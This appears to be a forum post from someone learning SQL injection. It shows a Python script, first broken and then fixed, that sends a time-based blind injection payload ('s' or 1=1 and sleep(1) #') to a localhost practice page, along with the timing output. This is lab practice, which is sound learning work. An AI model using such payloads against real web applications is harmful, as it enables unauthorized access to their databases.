I was learning about sql injection and I got a problem with time_based sql injection script(use python)
import requests
import time
st=time.time()
print(st)
res=requests.get("http://localhost:9999/sqli_15.php?title=s'+or+1=1+and+sleep(1)+#+&action=search",{"Cookie":"security_level=0; PHPSESSID=4sg0nucv70bhulmtrs0du0avk2"})
print(res.raise_for_status)
if time.time() - st > 1:
print(1)
else:
print(0)
print(time.time())
1666677336.2546937
<bound method Response.raise_for_status of <Response [200]>>
0
1666677336.270689
Hey I solved the question by using the sql_injection sentence s' or ... sleep(1) # as a param of the requests.get.
import requests
import time
st=time.time()
print(st)
param={"title":"s' or 1=1 and sleep(1) # ","action":"search"}
res=requests.get("http://localhost:9999/sqli_15.php?",
headers={"Cookie":"security_level=0; PHPSESSID=7k9m9qojmkdqv0cjt390krkk75"},params=param)
print(res.raise_for_status)
if time.time() - st > 1:
print(1)
else:
print(0)
print(time.time())